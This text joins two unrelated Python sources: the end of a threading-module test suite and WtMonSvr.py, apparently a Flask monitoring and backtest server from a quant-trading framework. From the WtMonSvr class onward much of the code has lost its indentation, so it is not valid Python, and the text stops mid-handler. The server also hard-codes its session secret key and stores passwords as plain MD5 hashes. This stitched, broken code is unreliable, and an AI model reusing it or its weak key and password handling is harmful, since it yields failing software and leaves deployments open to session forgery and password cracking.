    locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
    # Run the RLock test suite against the pure-Python implementation.
    locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
    # Run the RLock test suite against the C implementation, when available.
    locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
    # Run the shared Event test suite against threading.Event.
    eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
    # Condition uses an RLock by default and exports its API.
    locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
    # Run the shared Condition test suite against threading.Condition.
    condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
    # Run the shared Semaphore test suite against threading.Semaphore.
    semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
    # Run the shared BoundedSemaphore test suite against threading's version.
    semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
    # Run the shared Barrier test suite against threading.Barrier.
    barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
    """Miscellaneous module-level checks for the threading module."""

    def test__all__(self):
        # threading.__all__ must cover its public API, minus deliberately
        # undocumented legacy aliases.
        extra = {"ThreadError"}
        not_exported = {'currentThread', 'activeCount'}
        support.check__all__(self, threading, ('threading', '_thread'),
                             extra=extra, not_exported=not_exported)
class InterruptMainTests(unittest.TestCase):
    """Tests for _thread.interrupt_main() / KeyboardInterrupt delivery."""

    def test_interrupt_main_subthread(self):
        # Calling start_new_thread with a function that executes interrupt_main
        # should raise KeyboardInterrupt upon completion.
        def call_interrupt():
            _thread.interrupt_main()
        t = threading.Thread(target=call_interrupt)
        with self.assertRaises(KeyboardInterrupt):
            t.start()
            t.join()
        t.join()

    def test_interrupt_main_mainthread(self):
        # Make sure that if interrupt_main is called in main thread that
        # KeyboardInterrupt is raised instantly.
        with self.assertRaises(KeyboardInterrupt):
            _thread.interrupt_main()

    def test_interrupt_main_noerror(self):
        handler = signal.getsignal(signal.SIGINT)
        try:
            # No exception should arise.
            signal.signal(signal.SIGINT, signal.SIG_IGN)
            _thread.interrupt_main()

            signal.signal(signal.SIGINT, signal.SIG_DFL)
            _thread.interrupt_main()
        finally:
            # Restore original handler
            signal.signal(signal.SIGINT, handler)
class AtexitTests(unittest.TestCase):
    """Tests for threading._register_atexit() shutdown callbacks."""

    def test_atexit_output(self):
        # A registered callback runs during threading shutdown.
        rc, out, err = assert_python_ok("-c", """if True:
            import threading

            def run_last():
                print('parrot')

            threading._register_atexit(run_last)
            """)
        self.assertFalse(err)
        self.assertEqual(out.strip(), b'parrot')

    def test_atexit_called_once(self):
        # A callback must not run a second time at real interpreter exit
        # after an explicit threading._shutdown().
        rc, out, err = assert_python_ok("-c", """if True:
            import threading
            from unittest.mock import Mock

            mock = Mock()
            threading._register_atexit(mock)
            mock.assert_not_called()
            # force early shutdown to ensure it was called once
            threading._shutdown()
            mock.assert_called_once()
            """)
        self.assertFalse(err)

    def test_atexit_after_shutdown(self):
        # The only way to do this is by registering an atexit within
        # an atexit, which is intended to raise an exception.
        rc, out, err = assert_python_ok("-c", """if True:
            import threading

            def func():
                pass

            def run_last():
                threading._register_atexit(func)

            threading._register_atexit(run_last)
            """)
        self.assertTrue(err)
        self.assertIn("RuntimeError: can't register atexit after shutdown",
                      err.decode())
# Script entry point: run the whole test suite via unittest's CLI runner.
if __name__ == "__main__":
    unittest.main()
|
WtMonSvr.py | from flask import Flask, session, redirect, request, make_response
from flask_compress import Compress
import json
import yaml
import datetime
import os
import hashlib
import sys
import chardet
import pytz
from .WtLogger import WtLogger
from .DataMgr import DataMgr, backup_file
from .PushSvr import PushServer
from .WatchDog import WatchDog, WatcherSink
from .WtBtMon import WtBtMon
from wtpy import WtDtServo
def pack_rsp(obj):
    """Serialize *obj* as JSON and wrap it in a Flask response.

    The content-type header is forced to JSON with UTF-8 so Chinese text in
    the payload renders correctly in browsers.
    """
    payload = json.dumps(obj)
    response = make_response(payload)
    response.headers["content-type"] = "text/json;charset=utf-8"
    return response
def parse_data():
    """Parse the body of the current Flask request as UTF-8 JSON.

    Returns:
        (True, payload) on success, where payload is the decoded JSON object,
        or (False, error_dict) on any parse failure, matching the API's
        error-envelope convention (result/message keys).
    """
    try:
        data = request.get_data()
        json_data = json.loads(data.decode("utf-8"))
        return True, json_data
    except Exception:
        # BUGFIX: was a bare ``except:`` which also swallowed SystemExit and
        # KeyboardInterrupt; narrowed to Exception while keeping the
        # best-effort "return an error envelope" behavior for bad payloads.
        return False, {
            "result": -998,
            "message": "请求数据解析失败"
        }
def get_param(json_data, key:str, type=str, defVal = ""):
    """Fetch *key* from *json_data*, coerced with *type*; *defVal* if absent.

    Note: the parameter named ``type`` shadows the builtin, but the name is
    part of the public keyword interface and is therefore kept.
    """
    if key in json_data:
        return type(json_data[key])
    return defVal
# Helper that returns the last N lines of a file.
def get_tail(filename, N:int = 100, encoding="GBK") :
    """Return the last *N* lines of *filename* as (text, line_count).

    For files larger than one block, seeks near the end first so huge log
    files are not read in full (the first line of the tail may therefore be
    a partial line — same behavior as before).

    Returns:
        tuple(str, int): the joined tail text and the number of lines in it.
    """
    filesize = os.path.getsize(filename)
    blocksize = 10240
    # BUGFIX: use a context manager so the handle is closed even if
    # readlines()/seek() raises (the original leaked the handle on error).
    with open(filename, 'r', encoding=encoding) as dat_file:
        if filesize > blocksize :
            # Skip ahead to the last ~two blocks of the file.
            maxseekpoint = (filesize // blocksize)
            dat_file.seek((maxseekpoint-1)*blocksize)
        elif filesize :
            dat_file.seek(0, 0)
        lines = dat_file.readlines()
    last_lines = lines[-N:] if lines else []
    return ''.join(last_lines), len(last_lines)
def check_auth():
    """Validate the Flask session: logged in and not expired.

    Returns:
        (True, userinfo_dict) when the session is valid, otherwise
        (False, error_envelope) with the API's result/message keys.
    """
    usrInfo = session.get("userinfo")
    # No user info in the session: not logged in.
    if usrInfo is None:
        return False, {
            "result":-999,
            "message":"请先登录"
        }

    # User info present: check the stored expiry timestamp.
    exptime = session.get("expiretime")
    # NOTE(review): relies on lexicographic comparison of zero-padded
    # "%Y.%m.%d %H:%M:%S" strings, which works only if "expiretime" was
    # written in the same format and timezone — confirm against the login
    # handler that sets it.
    now = datetime.datetime.now().replace(tzinfo=pytz.timezone('UTC')).strftime("%Y.%m.%d %H:%M:%S")
    if now > exptime:
        return False, {
            "result":-999,
            "message":"登录已超时,请重新登录"
        }

    return True, usrInfo
def get_cfg_tree(root:str, name:str):
    """Build the file tree describing a strategy-group directory.

    Lists run.py, the main config file (config.json, falling back to
    config.yaml), any executer/parser/trader sub-config files referenced
    by the main config, and the generated/ subdirectory.

    @root   group directory (or file) path
    @name   display label for this tree node
    """
    if not os.path.exists(root):
        return {
            "label":name,
            "path":root,
            "exist":False,
            "isfile":False,
            "children":[]
        }
    if os.path.isfile(root):
        # NOTE(review): "exist" is False here even though the file exists;
        # kept unchanged because the console frontend may rely on it — confirm.
        return {
            "label":name,
            "path":root,
            "exist":False,
            "isfile":True
        }
    ret = {
        "label":name,
        "path":root,
        "exist":True,
        "isfile":False,
        "children":[]
    }
    filepath = os.path.join(root, "run.py")
    ret['children'].append({
        "label":"run.py",
        "path":filepath,
        "exist":True,
        "isfile":True,
        "children":[]
    })
    filepath = os.path.join(root, "config.json")
    isYaml = False
    if not os.path.exists(filepath):
        filepath = os.path.join(root, "config.yaml")
        isYaml = True
    ret['children'].append({
        "label":"config.yaml" if isYaml else "config.json",
        "path":filepath,
        "exist":True,
        "isfile":True,
        "children":[]
    })
    # Read raw bytes so chardet can sniff the encoding.  The original
    # opened the file in text mode, which made chardet.detect() reject
    # the str and `.decode()` fail (str has no decode in Python 3); this
    # also matches the 'rb' + chardet pattern used elsewhere in this file.
    with open(filepath, "rb") as f:
        content = f.read()
    encoding = chardet.detect(content[:500])["encoding"]
    content = content.decode(encoding)
    if isYaml:
        cfgObj = yaml.full_load(content)
    else:
        cfgObj = json.loads(content)
    # The three sub-config sections all expand the same way; order kept
    # identical to the original (executers, parsers, traders).
    for section in ("executers", "parsers", "traders"):
        if section in cfgObj:
            filename = cfgObj[section]
            if isinstance(filename, str):
                filepath = os.path.join(root, filename)
                ret['children'].append({
                    "label":filename,
                    "path":filepath,
                    "exist":True,
                    "isfile":True,
                    "children":[]
                })
    filepath = os.path.join(root, 'generated')
    ret["children"].append(get_path_tree(filepath, 'generated', True))
    return ret
def get_path_tree(root:str, name:str, hasFile:bool = True):
    """Recursively describe *root* as a nested label/path tree.

    Cache/IDE folders, package plumbing and compiled python files are
    skipped; when *hasFile* is False only directories are reported.
    At every level directories are listed before files.
    """
    if not os.path.exists(root):
        return {
            "label":name,
            "path":root,
            "exist":False,
            "isfile":False,
            "children":[]
        }
    if os.path.isfile(root):
        return {
            "label":name,
            "path":root,
            "exist":False,
            "isfile":True
        }
    node = {
        "label":name,
        "path":root,
        "exist":True,
        "isfile":False,
        "children":[]
    }
    children = node["children"]
    for entry in os.listdir(root):
        # Skip tooling folders, the wtpy package itself and compiled modules.
        if entry in ('__pycache__', '.vscode', 'wtpy', '__init__.py') or entry[-3:] == 'pyc':
            continue
        full = os.path.join(root, entry)
        if os.path.isfile(full):
            if hasFile:
                children.append({
                    "label":entry,
                    "path":full,
                    "exist":True,
                    "isfile":True})
        else:
            children.append(get_path_tree(full, entry, hasFile))
    # Stable partition: directories first, then files, original order kept
    # within each group (False sorts before True).
    node["children"] = sorted(children, key=lambda item: item["isfile"])
    return node
class WtMonSink:
    """Notification sink interface for WtMonSvr.

    Subclass and override notify() to receive monitor messages; the
    base implementation is a no-op.
    """

    def __init__(self):
        pass

    def notify(self, level:str, msg:str):
        """Receive one message of the given level; ignored by default."""
        pass
class WtMonSvr(WatcherSink):
def __init__(self, static_folder:str="", static_url_path="/", deploy_dir="C:/", sink:WtMonSink = None):
    '''
    WtMonSvr constructor
    @static_folder      root directory of the static web files (defaults to 'static')
    @static_url_path    URL path the static files are served under
    @deploy_dir         live-trading deployment directory
    @sink               optional notification sink for monitor messages
    '''
    if len(static_folder) == 0:
        static_folder = 'static'
    self.logger = WtLogger(__name__, "WtMonSvr.log")
    self._sink_ = sink
    # Data manager, mainly caches the per-group data (trades, funds, ...)
    self.__data_mgr__ = DataMgr('data.db', logger=self.logger)
    # Backtest manager and data servo are optional; set later via
    # set_bt_mon() / set_dt_servo().
    self.__bt_mon__:WtBtMon = None
    self.__dt_servo__:WtDtServo = None
    # Watchdog module, mainly schedules starting/stopping of the groups
    self._dog = WatchDog(sink=self, db=self.__data_mgr__.get_db(), logger=self.logger)
    app = Flask(__name__, instance_relative_config=True, static_folder=static_folder, static_url_path=static_url_path)
    # NOTE(review): hard-coded session secret key — consider loading it
    # from configuration or the environment.
    app.secret_key = "!@#$%^&*()"
    Compress(app)
    # app.debug = True
    self.app = app
    self.worker = None
    self.deploy_dir = deploy_dir
    self.deploy_tree = None
    self.push_svr = PushServer(app, self.__data_mgr__, self.logger)
    self.init_mgr_apis(app)
def set_bt_mon(self, btMon:WtBtMon):
    '''
    Set the backtest manager and register the /bt/* HTTP endpoints
    @btMon  backtest manager, a WtBtMon instance
    '''
    self.__bt_mon__ = btMon
    self.init_bt_apis(self.app)
def set_dt_servo(self, dtServo:WtDtServo):
    '''
    Set the data servo used to answer bar queries (/bt/qrybars)
    @dtServo    local data servo, a WtDtServo instance
    '''
    self.__dt_servo__ = dtServo
def init_bt_apis(self, app:Flask):
    '''
    Register the /bt/* HTTP endpoints used by the backtest console.

    Every handler follows the same pipeline: parse the JSON body,
    validate the login session, require the 'researcher' or 'superman'
    role, then delegate to the backtest manager (self.__bt_mon__).
    These routes are only registered from set_bt_mon(), i.e. after the
    backtest manager has been assigned.
    @app    the Flask application the routes are attached to
    '''
    # Fetch K-line (bar) data
    @app.route("/bt/qrybars", methods=["POST"])
    def qry_bt_bars():
        bSucc, json_data = parse_data()
        if not bSucc:
            return pack_rsp(json_data)
        bSucc, userInfo = check_auth()
        if not bSucc:
            return pack_rsp(userInfo)
        user = userInfo["loginid"]
        role = userInfo["role"]
        if role not in ['researcher','superman']:
            ret = {
                "result":-1,
                "message":"没有权限"
            }
            return pack_rsp(ret)
        if self.__dt_servo__ is None:
            ret = {
                "result":-2,
                "message":"没有配置数据伺服"
            }
            return pack_rsp(ret)
        stdCode = get_param(json_data, "code")
        period = get_param(json_data, "period")
        fromTime = get_param(json_data, "stime", int, None)
        dataCount = get_param(json_data, "count", int, None)
        endTime = get_param(json_data, "etime", int)
        bars = self.__dt_servo__.get_bars(stdCode=stdCode, period=period, fromTime=fromTime, dataCount=dataCount, endTime=endTime)
        if bars is None:
            ret = {
                "result":-2,
                "message":"Data not found"
            }
        else:
            # NOTE(review): to_dict is accessed without parentheses — verify
            # it is a property on the bar type, not an uncalled method.
            bar_list = [curBar.to_dict for curBar in bars]
            ret = {
                "result":0,
                "message":"Ok",
                "bars": bar_list
            }
        return pack_rsp(ret)

    # Fetch the user's strategy list
    @app.route("/bt/qrystras", methods=["POST"])
    def qry_my_stras():
        bSucc, json_data = parse_data()
        if not bSucc:
            return pack_rsp(json_data)
        bSucc, userInfo = check_auth()
        if not bSucc:
            return pack_rsp(userInfo)
        user = userInfo["loginid"]
        role = userInfo["role"]
        if role not in ['researcher','superman']:
            ret = {
                "result":-1,
                "message":"没有权限"
            }
            return pack_rsp(ret)
        # NOTE(review): unlike the other handlers there is no None check on
        # self.__bt_mon__ here; safe today because these routes are only
        # registered after set_bt_mon() assigns the manager.
        ret = {
            "result":0,
            "message":"OK",
            "strategies": self.__bt_mon__.get_strategies(user)
        }
        return pack_rsp(ret)

    # Fetch strategy source code
    @app.route("/bt/qrycode", methods=["POST"])
    def qry_stra_code():
        bSucc, json_data = parse_data()
        if not bSucc:
            return pack_rsp(json_data)
        bSucc, userInfo = check_auth()
        if not bSucc:
            return pack_rsp(userInfo)
        user = userInfo["loginid"]
        role = userInfo["role"]
        if role not in ['researcher','superman']:
            ret = {
                "result":-1,
                "message":"没有权限"
            }
            return pack_rsp(ret)
        straid = get_param(json_data, "straid")
        if self.__bt_mon__ is None:
            ret = {
                "result":-1,
                "message":"回测管理器未配置"
            }
        else:
            if not self.__bt_mon__.has_strategy(user, straid):
                ret = {
                    "result":-2,
                    "message":"策略代码不存在"
                }
            else:
                content = self.__bt_mon__.get_strategy_code(user, straid)
                ret = {
                    "result":0,
                    "message":"OK",
                    "content":content
                }
        return pack_rsp(ret)

    # Commit strategy source code
    @app.route("/bt/setcode", methods=["POST"])
    def set_stra_code():
        bSucc, json_data = parse_data()
        if not bSucc:
            return pack_rsp(json_data)
        bSucc, userInfo = check_auth()
        if not bSucc:
            return pack_rsp(userInfo)
        user = userInfo["loginid"]
        role = userInfo["role"]
        if role not in ['researcher','superman']:
            ret = {
                "result":-1,
                "message":"没有权限"
            }
            return pack_rsp(ret)
        straid = get_param(json_data, "straid")
        content = get_param(json_data, "content")
        if len(content) == 0 or len(straid) == 0:
            ret = {
                "result":-2,
                "message":"策略ID和代码不能为空"
            }
            return pack_rsp(ret)
        if self.__bt_mon__ is None:
            ret = {
                "result":-1,
                "message":"回测管理器未配置"
            }
        else:
            if not self.__bt_mon__.has_strategy(user, straid):
                ret = {
                    "result":-2,
                    "message":"策略不存在"
                }
            else:
                # `ret` is reused: first the bool result of the save call,
                # then the response payload built from it.
                ret = self.__bt_mon__.set_strategy_code(user, straid, content)
                if ret:
                    ret = {
                        "result":0,
                        "message":"OK"
                    }
                else:
                    ret = {
                        "result":-3,
                        "message":"保存策略代码失败"
                    }
        return pack_rsp(ret)

    # Add a user strategy
    @app.route("/bt/addstra", methods=["POST"])
    def cmd_add_stra():
        bSucc, json_data = parse_data()
        if not bSucc:
            return pack_rsp(json_data)
        bSucc, userInfo = check_auth()
        if not bSucc:
            return pack_rsp(userInfo)
        user = userInfo["loginid"]
        role = userInfo["role"]
        if role not in ['researcher','superman']:
            ret = {
                "result":-1,
                "message":"没有权限"
            }
            return pack_rsp(ret)
        name = get_param(json_data, "name")
        if len(name) == 0:
            ret = {
                "result":-2,
                "message":"策略名称不能为空"
            }
            return pack_rsp(ret)
        if self.__bt_mon__ is None:
            ret = {
                "result":-3,
                "message":"回测管理器未配置"
            }
            return pack_rsp(ret)
        straInfo = self.__bt_mon__.add_strategy(user, name)
        if straInfo is None:
            ret = {
                "result":-4,
                "message":"策略添加失败"
            }
        else:
            ret = {
                "result":0,
                "message":"OK",
                "strategy": straInfo
            }
        return pack_rsp(ret)

    # Delete a user strategy
    @app.route("/bt/delstra", methods=["POST"])
    def cmd_del_stra():
        bSucc, json_data = parse_data()
        if not bSucc:
            return pack_rsp(json_data)
        bSucc, userInfo = check_auth()
        if not bSucc:
            return pack_rsp(userInfo)
        user = userInfo["loginid"]
        role = userInfo["role"]
        if role not in ['researcher','superman']:
            ret = {
                "result":-1,
                "message":"没有权限"
            }
            return pack_rsp(ret)
        straid = get_param(json_data, "straid")
        if len(straid) == 0:
            ret = {
                "result":-2,
                "message":"策略ID不能为空"
            }
            return pack_rsp(ret)
        if self.__bt_mon__ is None:
            ret = {
                "result":-1,
                "message":"回测管理器未配置"
            }
        else:
            if not self.__bt_mon__.has_strategy(user, straid):
                ret = {
                    "result":-2,
                    "message":"策略不存在"
                }
            else:
                ret = self.__bt_mon__.del_strategy(user, straid)
                if ret:
                    ret = {
                        "result":0,
                        "message":"OK"
                    }
                else:
                    # NOTE(review): message reads "saving strategy code failed"
                    # although this is the delete path — looks copy-pasted.
                    ret = {
                        "result":-3,
                        "message":"保存策略代码失败"
                    }
        return pack_rsp(ret)

    # Get the backtest list of a strategy
    @app.route("/bt/qrystrabts", methods=["POST"])
    def qry_stra_bts():
        bSucc, json_data = parse_data()
        if not bSucc:
            return pack_rsp(json_data)
        bSucc, userInfo = check_auth()
        if not bSucc:
            return pack_rsp(userInfo)
        user = userInfo["loginid"]
        role = userInfo["role"]
        if role not in ['researcher','superman']:
            ret = {
                "result":-1,
                "message":"没有权限"
            }
            return pack_rsp(ret)
        straid = get_param(json_data, "straid")
        if len(straid) == 0:
            ret = {
                "result":-2,
                "message":"策略ID不能为空"
            }
            return pack_rsp(ret)
        if self.__bt_mon__ is None:
            ret = {
                "result":-1,
                "message":"回测管理器未配置"
            }
        else:
            if not self.__bt_mon__.has_strategy(user, straid):
                ret = {
                    "result":-2,
                    "message":"策略不存在"
                }
            else:
                ret = {
                    "result":0,
                    "message":"OK",
                    "backtests":self.__bt_mon__.get_backtests(user, straid)
                }
        return pack_rsp(ret)

    # Get the signals of a backtest
    @app.route("/bt/qrybtsigs", methods=["POST"])
    def qry_stra_bt_signals():
        bSucc, json_data = parse_data()
        if not bSucc:
            return pack_rsp(json_data)
        bSucc, userInfo = check_auth()
        if not bSucc:
            return pack_rsp(userInfo)
        user = userInfo["loginid"]
        role = userInfo["role"]
        if role not in ['researcher','superman']:
            ret = {
                "result":-1,
                "message":"没有权限"
            }
            return pack_rsp(ret)
        straid = get_param(json_data, "straid")
        btid = get_param(json_data, "btid")
        if len(straid) == 0 or len(btid) == 0:
            ret = {
                "result":-2,
                "message":"策略ID和回测ID不能为空"
            }
            return pack_rsp(ret)
        if self.__bt_mon__ is None:
            ret = {
                "result":-1,
                "message":"回测管理器未配置"
            }
        else:
            if not self.__bt_mon__.has_strategy(user, straid):
                ret = {
                    "result":-2,
                    "message":"策略不存在"
                }
            else:
                ret = {
                    "result":0,
                    "message":"OK",
                    "signals":self.__bt_mon__.get_bt_signals(user, straid, btid)
                }
        return pack_rsp(ret)

    # Delete a strategy backtest
    @app.route("/bt/delstrabt", methods=["POST"])
    def cmd_del_stra_bt():
        bSucc, json_data = parse_data()
        if not bSucc:
            return pack_rsp(json_data)
        bSucc, userInfo = check_auth()
        if not bSucc:
            return pack_rsp(userInfo)
        user = userInfo["loginid"]
        role = userInfo["role"]
        if role not in ['researcher','superman']:
            ret = {
                "result":-1,
                "message":"没有权限"
            }
            return pack_rsp(ret)
        btid = get_param(json_data, "btid")
        if len(btid) == 0:
            ret = {
                "result":-2,
                "message":"回测ID不能为空"
            }
            return pack_rsp(ret)
        if self.__bt_mon__ is None:
            ret = {
                "result":-1,
                "message":"回测管理器未配置"
            }
        else:
            # Deletion result is not checked; the handler always reports OK.
            self.__bt_mon__.del_backtest(user, btid)
            ret = {
                "result":0,
                "message":"OK"
            }
        return pack_rsp(ret)

    # Get the trades of a backtest
    @app.route("/bt/qrybttrds", methods=["POST"])
    def qry_stra_bt_trades():
        bSucc, json_data = parse_data()
        if not bSucc:
            return pack_rsp(json_data)
        bSucc, userInfo = check_auth()
        if not bSucc:
            return pack_rsp(userInfo)
        user = userInfo["loginid"]
        role = userInfo["role"]
        if role not in ['researcher','superman']:
            ret = {
                "result":-1,
                "message":"没有权限"
            }
            return pack_rsp(ret)
        straid = get_param(json_data, "straid")
        btid = get_param(json_data, "btid")
        if len(straid) == 0 or len(btid) == 0:
            ret = {
                "result":-2,
                "message":"策略ID和回测ID不能为空"
            }
            return pack_rsp(ret)
        if self.__bt_mon__ is None:
            ret = {
                "result":-1,
                "message":"回测管理器未配置"
            }
        else:
            if not self.__bt_mon__.has_strategy(user, straid):
                ret = {
                    "result":-2,
                    "message":"策略不存在"
                }
            else:
                ret = {
                    "result":0,
                    "message":"OK",
                    "trades":self.__bt_mon__.get_bt_trades(user, straid, btid)
                }
        return pack_rsp(ret)

    # Get the funds (equity curve) of a backtest
    @app.route("/bt/qrybtfunds", methods=["POST"])
    def qry_stra_bt_funds():
        bSucc, json_data = parse_data()
        if not bSucc:
            return pack_rsp(json_data)
        bSucc, userInfo = check_auth()
        if not bSucc:
            return pack_rsp(userInfo)
        user = userInfo["loginid"]
        role = userInfo["role"]
        if role not in ['researcher','superman']:
            ret = {
                "result":-1,
                "message":"没有权限"
            }
            return pack_rsp(ret)
        straid = get_param(json_data, "straid")
        btid = get_param(json_data, "btid")
        if len(straid) == 0 or len(btid) == 0:
            ret = {
                "result":-2,
                "message":"策略ID和回测ID不能为空"
            }
            return pack_rsp(ret)
        if self.__bt_mon__ is None:
            ret = {
                "result":-1,
                "message":"回测管理器未配置"
            }
        else:
            if not self.__bt_mon__.has_strategy(user, straid):
                ret = {
                    "result":-2,
                    "message":"策略不存在"
                }
            else:
                ret = {
                    "result":0,
                    "message":"OK",
                    "funds":self.__bt_mon__.get_bt_funds(user, straid, btid)
                }
        return pack_rsp(ret)

    # Get the round-trips of a backtest
    @app.route("/bt/qrybtrnds", methods=["POST"])
    def qry_stra_bt_rounds():
        bSucc, json_data = parse_data()
        if not bSucc:
            return pack_rsp(json_data)
        bSucc, userInfo = check_auth()
        if not bSucc:
            return pack_rsp(userInfo)
        user = userInfo["loginid"]
        role = userInfo["role"]
        if role not in ['researcher','superman']:
            ret = {
                "result":-1,
                "message":"没有权限"
            }
            return pack_rsp(ret)
        straid = get_param(json_data, "straid")
        btid = get_param(json_data, "btid")
        if len(straid) == 0 or len(btid) == 0:
            ret = {
                "result":-2,
                "message":"策略ID和回测ID不能为空"
            }
            return pack_rsp(ret)
        if self.__bt_mon__ is None:
            ret = {
                "result":-1,
                "message":"回测管理器未配置"
            }
        else:
            if not self.__bt_mon__.has_strategy(user, straid):
                ret = {
                    "result":-2,
                    "message":"策略不存在"
                }
            else:
                ret = {
                    "result":0,
                    "message":"OK",
                    "rounds":self.__bt_mon__.get_bt_rounds(user, straid, btid)
                }
        return pack_rsp(ret)

    # Launch a strategy backtest
    @app.route("/bt/runstrabt", methods=["POST"])
    def cmd_run_stra_bt():
        bSucc, json_data = parse_data()
        if not bSucc:
            return pack_rsp(json_data)
        bSucc, userInfo = check_auth()
        if not bSucc:
            return pack_rsp(userInfo)
        user = userInfo["loginid"]
        role = userInfo["role"]
        if role not in ['researcher','superman']:
            ret = {
                "result":-1,
                "message":"没有权限"
            }
            return pack_rsp(ret)
        # Default time window is today (yyyymmdd as an int).
        curDt = int(datetime.datetime.now().strftime("%Y%m%d"))
        straid = get_param(json_data, "straid")
        fromtime = get_param(json_data, "stime", int, defVal=curDt)
        endtime = get_param(json_data, "etime", int, defVal=curDt)
        capital = get_param(json_data, "capital", float, defVal=500000)
        slippage = get_param(json_data, "slippage", int, defVal=0)
        if len(straid) == 0:
            ret = {
                "result":-2,
                "message":"策略ID不能为空"
            }
            return pack_rsp(ret)
        if fromtime > endtime:
            fromtime,endtime = endtime,fromtime
        # Expand yyyymmdd dates into yyyymmddHHMM; 0900/1515 are presumably
        # the trading session open/close times — confirm against WtBtMon.
        fromtime = fromtime*10000 + 900
        endtime = endtime*10000 + 1515
        if self.__bt_mon__ is None:
            ret = {
                "result":-1,
                "message":"回测管理器未配置"
            }
        else:
            if not self.__bt_mon__.has_strategy(user, straid):
                ret = {
                    "result":-2,
                    "message":"策略不存在"
                }
            else:
                btInfo = self.__bt_mon__.run_backtest(user,straid,fromtime,endtime,capital,slippage)
                ret = {
                    "result":0,
                    "message":"OK",
                    "backtest": btInfo
                }
        return pack_rsp(ret)
def init_mgr_apis(self, app:Flask):
@app.route("/console", methods=["GET"])
def stc_console_index():
return redirect("./console/index.html")
@app.route("/mobile", methods=["GET"])
def stc_mobile_index():
return redirect("./mobile/index.html")
'''下面是API接口的编写'''
@app.route("/mgr/login", methods=["POST"])
def cmd_login():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
if True:
user = get_param(json_data, "loginid")
pwd = get_param(json_data, "passwd")
if len(user) == 0 or len(pwd) == 0:
ret = {
"result":-1,
"message":"用户名和密码不能为空"
}
else:
encpwd = hashlib.md5((user+pwd).encode("utf-8")).hexdigest()
now = datetime.datetime.now()
usrInf = self.__data_mgr__.get_user(user)
if usrInf is None:
ret = {
"result":-1,
"message":"用户不存在"
}
elif encpwd != usrInf["passwd"]:
ret = {
"result":-1,
"message":"登录密码错误"
}
else:
usrInf.pop("passwd")
usrInf["loginip"]=request.remote_addr
usrInf["logintime"]=now.strftime("%Y/%m/%d %H:%M:%S")
exptime = now + datetime.timedelta(minutes=360) #360分钟令牌超时
session["userinfo"] = usrInf
session["expiretime"] = exptime.replace(tzinfo=pytz.timezone('UTC')).strftime("%Y.%m.%d %H:%M:%S")
ret = {
"result":0,
"message":"Ok",
"userinfo":usrInf
}
self.__data_mgr__.log_action(usrInf, "login", json.dumps(request.headers.get('User-Agent')))
else:
ret = {
"result":-1,
"message":"请求处理出现异常",
}
if session.get("userinfo") is not None:
session.pop("userinfo")
return pack_rsp(ret)
# 修改密码
@app.route("/mgr/modpwd", methods=["POST"])
def mod_pwd():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
oldpwd = get_param(json_data, "oldpwd")
newpwd = get_param(json_data, "newpwd")
if len(oldpwd) == 0 or len(newpwd) == 0:
ret = {
"result":-1,
"message":"新旧密码都不能为空"
}
else:
user = adminInfo["loginid"]
oldencpwd = hashlib.md5((user+oldpwd).encode("utf-8")).hexdigest()
usrInf = self.__data_mgr__.get_user(user)
if usrInf is None:
ret = {
"result":-1,
"message":"用户不存在"
}
else:
if oldencpwd != usrInf["passwd"]:
ret = {
"result":-1,
"message":"旧密码错误"
}
else:
if 'builtin' in usrInf and usrInf["builtin"]:
#如果是内建账号要改密码,则先添加用户
usrInf["passwd"] = oldpwd
self.__data_mgr__.add_user(usrInf, user)
print("%s是内建账户,自动添加到数据库中" % user)
newencpwd = hashlib.md5((user+newpwd).encode("utf-8")).hexdigest()
self.__data_mgr__.mod_user_pwd(user, newencpwd, user)
ret = {
"result":0,
"message":"Ok"
}
return pack_rsp(ret)
# 添加组合
@app.route("/mgr/addgrp", methods=["POST"])
def cmd_add_group():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
id = get_param(json_data, "groupid")
name = get_param(json_data, "name")
path = get_param(json_data, "path")
info = get_param(json_data, "info")
gtype = get_param(json_data, "gtype")
env = get_param(json_data, "env")
datmod = get_param(json_data, "datmod")
mqurl = get_param(json_data, "mqurl")
action = get_param(json_data, "action")
if action == "":
action = "add"
if len(id) == 0 or len(name) == 0 or len(gtype) == 0:
ret = {
"result":-1,
"message":"组合ID、名称、类型都不能为空"
}
elif not os.path.exists(path) or not os.path.isdir(path):
ret = {
"result":-2,
"message":"组合运行目录不正确"
}
elif action == "add" and self.__data_mgr__.has_group(id):
ret = {
"result":-3,
"message":"组合ID不能重复"
}
else:
try:
grpInfo = {
"id":id,
"name":name,
"path":path,
"info":info,
"gtype":gtype,
"datmod":datmod,
"env":env,
"mqurl":mqurl
}
if self.__data_mgr__.add_group(grpInfo):
ret = {
"result":0,
"message":"Ok"
}
if action == "add":
self.__data_mgr__.log_action(adminInfo, "addgrp", json.dumps(grpInfo))
else:
self.__data_mgr__.log_action(adminInfo, "modgrp", json.dumps(grpInfo))
self._dog.updateMQURL(id, mqurl)
else:
ret = {
"result":-2,
"message":"添加用户失败"
}
except:
ret = {
"result":-1,
"message":"请求解析失败"
}
return pack_rsp(ret)
# 删除组合
@app.route("/mgr/delgrp", methods=["POST"])
def cmd_del_group():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
id = get_param(json_data, "groupid")
if len(id) == 0:
ret = {
"result":-1,
"message":"组合ID不能为空"
}
elif not self.__data_mgr__.has_group(id):
ret = {
"result":-3,
"message":"该组合不存在"
}
elif self._dog.isRunning(id):
ret = {
"result":-3,
